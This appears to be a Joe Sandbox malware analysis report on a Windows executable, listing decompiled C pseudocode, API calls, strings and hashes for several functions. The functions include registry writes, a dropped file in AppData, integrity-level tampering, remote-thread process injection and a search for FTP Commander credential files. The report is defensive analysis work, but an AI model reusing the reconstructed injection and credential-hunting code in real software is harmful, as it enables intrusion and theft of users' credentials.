						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x0040e89a
0x0040e89d
0x0040e89f
0x0040e8a1
0x0040e8aa
0x0040e8ad
0x0040e8b6
0x0040e8d3
0x00000000
0x0040e8d5
0x0040e8d8
0x0040e8de
0x0040e8eb
0x00000000
0x00000000
0x00000000
0x0040e8de
0x0040e8ef
0x0040e8f2
0x00000000
0x0040e8e0
0x0040e8e0
0x0040e8e3
0x00000000
0x0040e8e9
0x0040e8f5
0x0040e8fb

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 0040E89D

Part of subcall function 0040E6D9: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0040E7FB

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0040E8CF
RegCloseKey.ADVAPI32(?), ref: 0040E8D8
RegCloseKey.ADVAPI32(?), ref: 0040E8F2

Strings

d, xrefs: 0040E8E3
SOFTWARE\Microsoft, xrefs: 0040E890

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: 533a63e244da6762766b3e8d58623738a9e6d1c2019b3e1c3d54652976b1b9b2
Instruction ID: 40e2ae33d276945f0e3d46e165ef63a88525fa2e087ad4151fde08719faaf157
Opcode Fuzzy Hash: 533a63e244da6762766b3e8d58623738a9e6d1c2019b3e1c3d54652976b1b9b2
Instruction Fuzzy Hash: C8115EB290021CBEEB01AB95DC81EEFBB7DEF04388F104476F601B2291D2759E559B74

Uniqueness

Uniqueness Score: -1.00%

Function 00411954, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411954(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				void* __esi;
				long _t3;
				WCHAR* _t13;
				WCHAR* _t19;
				WCHAR* _t20;

				_t13 = __ebx;
				_t19 = L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik";
				_t20 = L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig";
				if(L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik" == 0) {
					E00407BD4(__ecx, _t19, _t20, 1);
					 *((short*)(E00409833(_t20, _t19, E0040A3AA(_t19) + _t10) + L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig")) = 0;
					_t3 = PathRemoveFileSpecW(_t20);
				}
				if(_t13 != 0) {
					E00409AD3(_t3 | 0xffffffff, _t19, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x41953c > 1) {
					E0040B3BA(_t20);
					E0040DBD3(_t20);
					_t3 = GetFileAttributesW(_t19);
					if(_t3 != 0xffffffff) {
						return E0040DBD3(_t19);
					}
				}
				return _t3;
			}

0x00411954
0x0041195e
0x00411963
0x00411968
0x0041196c
0x00411985
0x0041198c
0x0041198c
0x00411994
0x0041199d
0x004119a8
0x004119a8
0x004119b3
0x004119bf
0x004119c5
0x004119cb
0x004119d4
0x00000000
0x004119d7
0x004119d4
0x004119de

APIs

PathRemoveFileSpecW.SHLWAPI(C:\Users\Jamey\AppData\Roaming\Ytveig,C:\Users\Jamey\AppData\Roaming\Ytveig,C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik,00000000,00000001,00000000,00020000,00412435,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722), ref: 0041198C
PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00412435,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?,?), ref: 004119A8
GetFileAttributesW.KERNEL32(C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik,C:\Users\Jamey\AppData\Roaming\Ytveig,C:\Users\Jamey\AppData\Roaming\Ytveig,00000000,00020000,00412435,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 004119CB

Strings

.tmp, xrefs: 004119A2
C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik, xrefs: 00411954, 0041195E, 0041197B, 004119CA, 004119D6
C:\Users\Jamey\AppData\Roaming\Ytveig, xrefs: 00411963, 0041197C, 00411984, 004119BE, 004119C4

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: FilePath$AttributesExtensionRemoveRenameSpec
String ID: .tmp$C:\Users\Jamey\AppData\Roaming\Ytveig$C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik
API String ID: 3957249617-106506248
Opcode ID: 770158e217f8fabb34e54a4ff136bd286ebedb6e779732a109474c606ce93d48
Instruction ID: a9a3f87515d9d1dcb4a58fb71e146e3ce457fbc5cca0916897b843bc0c201031
Opcode Fuzzy Hash: 770158e217f8fabb34e54a4ff136bd286ebedb6e779732a109474c606ce93d48
Instruction Fuzzy Hash: FAF0F271A1129025D7113B329D49AFF356A8F82324F18813FB521B12E2CBBC4CC286AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBD3, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040DBD3(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E0040F3C3(L"SeSecurityPrivilege");
				_push(0);
				_t11 =  &_v12;
				_push(_t11);
				_push(1);
				_push(L"S:(ML;CIOI;NRNWNX;;;LW)");
				L00415950();
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x0040dbdf
0x0040dbe1
0x0040dbe6
0x0040dbe7
0x0040dbea
0x0040dbeb
0x0040dbed
0x0040dbf2
0x0040dbf9
0x0040dc0a
0x0040dc0d
0x0040dc15
0x0040dc24
0x0040dc2c
0x0040dc2e
0x0040dc2e
0x0040dc2c
0x0040dc33
0x0040dc33
0x0040dc3d

APIs

Part of subcall function 0040F3C3: GetCurrentThread.KERNEL32 ref: 0040F3D3
Part of subcall function 0040F3C3: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3DA
Part of subcall function 0040F3C3: OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3EC

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040DBF2
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000,S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000,SeSecurityPrivilege,00000000), ref: 0040DC0D
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 0040DC24
LocalFree.KERNEL32(00000000), ref: 0040DC33

Strings

SeSecurityPrivilege, xrefs: 0040DBDA
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 0040DBED

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: ce89749bd0abad5c7769c3836abe1dc1d4bf861e46c746144d31045149a7338c
Instruction ID: f98c02f58e4d6ebcc571847f5be9e642b85eab39ae92dc3a7b900450a8a6e01d
Opcode Fuzzy Hash: ce89749bd0abad5c7769c3836abe1dc1d4bf861e46c746144d31045149a7338c
Instruction Fuzzy Hash: 0EF0817590020CBEEB119FD08D85EEF7B7CAB04344F000033B901B11D1E6B59A58AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00413360, Relevance: 9.2, APIs: 6, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413360(void* __eflags, char* _a4, intOrPtr _a8, signed int _a12, signed int* _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v24;
				char _v28;
				void* __edi;
				void* __esi;
				signed int _t56;
				void* _t59;
				signed int* _t60;
				intOrPtr _t61;
				signed int _t62;
				signed int* _t63;
				signed int _t72;
				void* _t78;
				char* _t82;
				short* _t89;
				void* _t94;
				intOrPtr _t96;
				intOrPtr* _t100;
				long _t102;
				signed int _t104;
				struct _GOPHER_FIND_DATAA _t108;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x41aa38);
				_t100 = _a4;
				_t56 = E00412CBF( *_t100);
				if(_t56 == 0xffffffff) {
					L35:
					LeaveCriticalSection(0x41aa38);
					return _v16;
				}
				_t96 =  *0x41aa50; // 0x0
				_t59 = _t56 * 0x24 + _t96;
				if( *((intOrPtr*)(_t59 + 0x10)) <= 0) {
					goto L35;
				}
				_t94 = _t59;
				if( *((intOrPtr*)(_t94 + 0x10)) != 1 || ( *( *(_t94 + 0xc)) & 0x00000003) == 0) {
					_t60 = _a16;
					if(_t60 != 0) {
						 *_t60 =  *_t60 & 0x00000000;
					}
					if( *((intOrPtr*)(_t94 + 0x18)) != 0xffffffff) {
						L22:
						_t61 =  *((intOrPtr*)(_t94 + 0x18));
						if(_t61 != 0xffffffff && _v16 == 0xffffffff) {
							_t62 = _t61 -  *((intOrPtr*)(_t94 + 0x1c));
							_t104 = _t62;
							if(_t62 != 0) {
								if(_a8 == 0) {
									_a12 = E0040B82B(0x2000, 0x1000);
								}
								if(_a12 < _t104) {
									_t104 = _a12;
								}
								if(_a8 != 0) {
									E00409833(_a8,  *((intOrPtr*)(_t94 + 0x14)) +  *((intOrPtr*)(_t94 + 0x1c)), _t104);
									 *((intOrPtr*)(_t94 + 0x1c)) =  *((intOrPtr*)(_t94 + 0x1c)) + _t104;
								}
							}
							_t63 = _a16;
							if(_t63 != 0) {
								 *_t63 = _t104;
							}
							_v16 = 1;
						}
						goto L34;
					}
					LeaveCriticalSection(0x41aa38);
					_v5 = E0041323E( &_v20,  *_t100,  *((intOrPtr*)(_t94 + 4)),  &_v12);
					EnterCriticalSection(0x41aa38);
					if(_v5 == 0) {
						L21:
						_v16 = _v16 & 0x00000000;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t106 =  *_a4;
					_t72 = E00412CBF( *_a4);
					if(_t72 == 0xffffffff) {
						E004097F7(_v12);
						goto L21;
					}
					_t94 = _t72 * 0x24 +  *0x41aa50;
					_v24 = E0040AF2B( &_v28, _t106);
					_t78 = E00404375( *((intOrPtr*)(_t94 + 0x10)),  *(_t94 + 0xc), _t76,  &_v12,  &_v20);
					_t102 = _v20;
					if(_t78 != 0) {
						_t82 = E00409A3C(_v28, 0, _v24);
						_a4 = _t82;
						if(_t82 != 0) {
							_v20 = 0x1000;
							_t108 = E004097CC(0x1000);
							if(_t108 != 0) {
								 *_t108 = 0x50;
								if(GetUrlCacheEntryInfoW(_a4, _t108,  &_v20) != 0) {
									_t89 =  *((intOrPtr*)(_t108 + 8));
									if(_t89 != 0 &&  *_t89 != 0) {
										E0040AFDF(_t102, _t89, _v12);
									}
								}
								E004097F7(_t108);
							}
							E004097F7(_a4);
						}
					}
					E004097F7(_v24);
					 *((intOrPtr*)(_t94 + 0x14)) = _v12;
					 *((intOrPtr*)(_t94 + 0x18)) = _t102;
					goto L22;
				} else {
					 *_t100 =  *((intOrPtr*)(_t94 + 0x20));
					L34:
					goto L35;
				}
			}

0x00413366
0x00413371
0x00413377
0x0041337c
0x00413384
0x00413533
0x00413538
0x00413544
0x00413544
0x0041338a
0x00413393
0x00413399
0x00000000
0x00000000
0x004133a0
0x004133a6
0x004133ba
0x004133bf
0x004133c1
0x004133c1
0x004133c8
0x004134d4
0x004134d4
0x004134da
0x004134e2
0x004134e5
0x004134e7
0x004134ed
0x004134fe
0x004134fe
0x00413504
0x00413506
0x00413506
0x0041350d
0x0041351a
0x0041351f
0x0041351f
0x0041350d
0x00413522
0x00413527
0x00413529
0x00413529
0x0041352b
0x0041352b
0x00000000
0x004134da
0x004133d6
0x004133f0
0x004133f3
0x004133fd
0x004134c5
0x004134c5
0x004134ce
0x00000000
0x004134ce
0x00413406
0x00413408
0x00413410
0x004134c0
0x00000000
0x004134c0
0x00413423
0x00413434
0x0041343b
0x00413440
0x00413445
0x0041344f
0x00413454
0x00413459
0x00413460
0x00413468
0x0041346c
0x00413476
0x00413484
0x00413486
0x0041348b
0x00413497
0x00413497
0x0041348b
0x0041349d
0x0041349d
0x004134a5
0x004134a5
0x00413459
0x004134ad
0x004134b5
0x004134b8
0x00000000
0x004133b0
0x004133b3
0x00413532
0x00000000
0x00413532

APIs

EnterCriticalSection.KERNEL32(0041AA38), ref: 00413371
LeaveCriticalSection.KERNEL32(0041AA38), ref: 004133D6
EnterCriticalSection.KERNEL32(0041AA38), ref: 004133F3
GetUrlCacheEntryInfoW.WININET(?,00000000,00000001), ref: 0041347C
SetLastError.KERNEL32(00002EE4), ref: 004134CE
LeaveCriticalSection.KERNEL32(0041AA38), ref: 00413538

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
String ID:
API String ID: 3653105453-0
Opcode ID: 96fb809e956990848bc62048120db38640ec5e7c3259e41cd5edcdccd39a15b1
Instruction ID: cd49f25b1dbb4c9b6420f754db66c36a11ae88ba76f33cf03904b4d841ce925c
Opcode Fuzzy Hash: 96fb809e956990848bc62048120db38640ec5e7c3259e41cd5edcdccd39a15b1
Instruction Fuzzy Hash: D5519A31900205ABCF15DF65C984ADE7BB4AF04365F0481AAF811BB2E2C778DE91CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041323E, Relevance: 9.1, APIs: 6, Instructions: 96
networkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041323E(intOrPtr* __edi, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				void* _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				void* _t30;
				intOrPtr _t31;
				void** _t36;
				intOrPtr _t43;
				intOrPtr* _t57;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t64;

				_t62 = __edi;
				ResetEvent(_a8);
				_t30 = HeapAlloc( *0x41a570, 8, 0x1004);
				_t64 = 0;
				_v52 = _t30;
				if(_t30 != 0) {
					_t57 = __imp__InternetSetStatusCallbackW;
					_t31 =  *_t57(_a4, E004131F5);
					_t61 = 0x28;
					_v56 = _t31;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E004098AA( &_v52,  &_v52, 0, _t61);
					_v64 = _t61;
					_v44 = _v72;
					while(1) {
						L3:
						_t36 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t36, 8, _t64);
						if(_t36 == 0) {
							break;
						}
						if(_v44 != _t64) {
							_t66 = _a12;
							if(E00409787( *_t62 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E00409833( *_t66 +  *_t62, _v76, _v44);
								 *_t62 =  *_t62 + _v56;
								_t64 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t57(_a4,  ~(_v72 + 1) & _v72);
						E004097F7(_v84);
						if(_v89 == 0) {
							E004097F7( *_a12);
						}
						_t43 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E0040DCC2( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E004097F7(0);
					_t43 = 0;
				}
				L13:
				return _t43;
			}

0x0041323e
0x0041324c
0x0041325f
0x00413265
0x00413267
0x0041326d
0x0041327c
0x0041328a
0x0041328e
0x0041328f
0x00413297
0x0041329f
0x004132a1
0x004132a6
0x004132af
0x004132b3
0x004132b7
0x004132b7
0x004132ba
0x004132c2
0x004132ca
0x004132d2
0x00000000
0x00000000
0x004132f0
0x004132f8
0x00413302
0x00413322
0x00413322
0x00413304
0x00413313
0x0041331c
0x0041331e
0x00000000
0x0041331e
0x00413302
0x00413327
0x0041332e
0x00413338
0x0041333e
0x00413348
0x0041334f
0x0041334f
0x00413354
0x00000000
0x00413354
0x004132df
0x00000000
0x004132e1
0x004132e5
0x00000000
0x004132e5
0x00000000
0x0041326f
0x00413270
0x00413275
0x00413275
0x00413358
0x0041335d

APIs

ResetEvent.KERNEL32(?), ref: 0041324C
HeapAlloc.KERNEL32(00000008,00001004), ref: 0041325F
InternetSetStatusCallbackW.WININET(?,004131F5), ref: 0041328A
InternetReadFileExA.WININET ref: 004132CA
GetLastError.KERNEL32 ref: 004132D4
InternetSetStatusCallbackW.WININET(?,?), ref: 00413338

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Internet$CallbackHeapStatus$AllocErrorEventFileFreeLastReadReset
String ID:
API String ID: 3721613131-0
Opcode ID: 49f7a83317770991392ce235f6fa4fddeace65b2da52b1ec2c325bd4cf129595
Instruction ID: d9d175b81a573eb8cda96dcb65ee560d532a4a3bcf79016aaade26ebb910999a
Opcode Fuzzy Hash: 49f7a83317770991392ce235f6fa4fddeace65b2da52b1ec2c325bd4cf129595
Instruction Fuzzy Hash: 6B318A31118385AFCB01EF64CC84A9ABBE8FF49704F00482AF994A72A1D734C954DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B046, Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040B046(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x0040b046
0x0040b059
0x0040b06b
0x0040b071
0x0040b077
0x0040b0e7
0x0040b0e7
0x0040b079
0x0040b07e
0x0040b086
0x0040b0de
0x0040b0e1
0x00000000
0x0040b08d
0x0040b08d
0x0040b090
0x0040b095
0x0040b0a6
0x0040b0ac
0x0040b0b0
0x00000000
0x0040b0b2
0x0040b0c6
0x0040b0d8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b0c6
0x0040b097
0x0040b097
0x0040b099
0x0040b099
0x0040b099
0x0040b095
0x0040b086
0x0040b0eb

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0040800F), ref: 0040B06B
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040800F), ref: 0040B07E
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,0040800F), ref: 0040B0A6
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040800F), ref: 0040B0BE
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,0040800F), ref: 0040B0D8
CloseHandle.KERNEL32(?,?,?,?,?,0040800F), ref: 0040B0E1

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: e74d0a2c8f147a15a116b490acf780b5f2c6d53b743ea17bced7c6a9900d43a8
Instruction ID: 10d781cc93605252a6cab676625678e958298183cb8f9fbc820f822a1ad2857c
Opcode Fuzzy Hash: e74d0a2c8f147a15a116b490acf780b5f2c6d53b743ea17bced7c6a9900d43a8
Instruction Fuzzy Hash: A4119075100204BFDB208F21CC09E6BBBA8EB45700B10492DF5A6E61E0D371A941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00413B6A, Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00413B6A(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E00407A4C(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x4192e4 + E00407F75, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x00413b6a
0x00413b6d
0x00413b7b
0x00413b84
0x00413b86
0x00413b88
0x00413b8a
0x00413b8f
0x00413b94
0x00413b98
0x00413bac
0x00413bb2
0x00413bb7
0x00413bdc
0x00413bb9
0x00413bbf
0x00413bc8
0x00413bce
0x00413bce
0x00413bb7
0x00413be3
0x00413be9
0x00413bf0

APIs

OpenProcess.KERNEL32(0000047A,00000000,?,00000000,74B5F560,?,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413B7E
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00821259,00000000,00000000,00000000), ref: 00413BAC
WaitForSingleObject.KERNEL32(00000000,00002710,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413BBF
CloseHandle.KERNEL32(?,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413BC8
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413BDC
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413BE3

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: dd289c01b383abc87acc3466b3e7fda05704e66ef4cf5e25379be0e872c4b371
Instruction ID: 35cee8e4012eda82255207dc41d42c485caeb8853b0c6136a9efa923e11a568c
Opcode Fuzzy Hash: dd289c01b383abc87acc3466b3e7fda05704e66ef4cf5e25379be0e872c4b371
Instruction Fuzzy Hash: 0A019EB2508108BFE7016FA49CC8DFF3E6CEB49399B044479F601AA121D67AAD858639

Uniqueness

Uniqueness Score: -1.00%

Function 00406898, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00406898() {
				intOrPtr _v8;
				char _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v548;
				char* _t18;
				signed int _t25;
				void* _t27;

				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				_v16 = L"ftp*commander*";
				E004098AA( &_v12,  &_v12, 0, 8);
				_t25 = 0;
				do {
					_t18 =  &_v548;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t27 + _t25 * 4 - 0x18)), 0, 0, _t18);
					_t29 = _t18;
					if(_t18 == 0) {
						_t24 =  &_v16;
						_t18 = E0040B4D8( &_v548,  &_v16, _t29, 1, 2, E00406664,  &_v12, 0, 0, 0);
					}
					_t25 = _t25 + 1;
				} while (_t25 < 3);
				_t31 = _v8;
				if(_v8 > 0) {
					E00412508(_t18, _v12, _t24, _t31, L"FTP Commander");
				}
				return E004097F7(_v12);
			}

0x004068ac
0x004068b3
0x004068ba
0x004068c1
0x004068c8
0x004068cd
0x004068cf
0x004068cf
0x004068dd
0x004068e3
0x004068e5
0x004068f7
0x00406900
0x00406900
0x00406905
0x00406906
0x0040690b
0x0040690e
0x00406918
0x00406918
0x00406928

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 004068DD

Part of subcall function 0040B4D8: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
Part of subcall function 0040B4D8: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
Part of subcall function 0040B4D8: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
Part of subcall function 0040B4D8: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
Part of subcall function 0040B4D8: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626

Strings

FTP Commander, xrefs: 00406913
ftp*commander*, xrefs: 004068C1
&, xrefs: 004068AC
#, xrefs: 004068BA

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

